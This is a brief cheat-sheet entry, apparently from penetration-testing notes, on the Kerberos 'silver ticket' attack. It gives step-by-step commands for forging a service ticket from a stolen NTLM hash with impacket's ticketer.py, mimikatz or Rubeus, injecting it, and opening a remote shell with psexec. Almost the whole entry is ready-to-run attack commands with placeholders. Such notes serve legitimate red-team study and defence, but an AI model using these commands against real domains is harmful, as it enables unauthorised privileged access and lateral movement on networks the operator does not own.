6. Silver ticket
- craft valid TGS for a service after owning NTLM hash of an account
- gain access of that service by forging custom TGS with max privilege
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)
Linux
ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN\USERNAME@$IP -k -no-pass
Windows
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME
kerberos::ptt TICKET.kirbi
or use Rubeus to do the same
.\Rubeus.exe ptt /ticket:TICKET.kirbi
.\PsExec.exe -accepteula \\DCDOMAINNAME cmd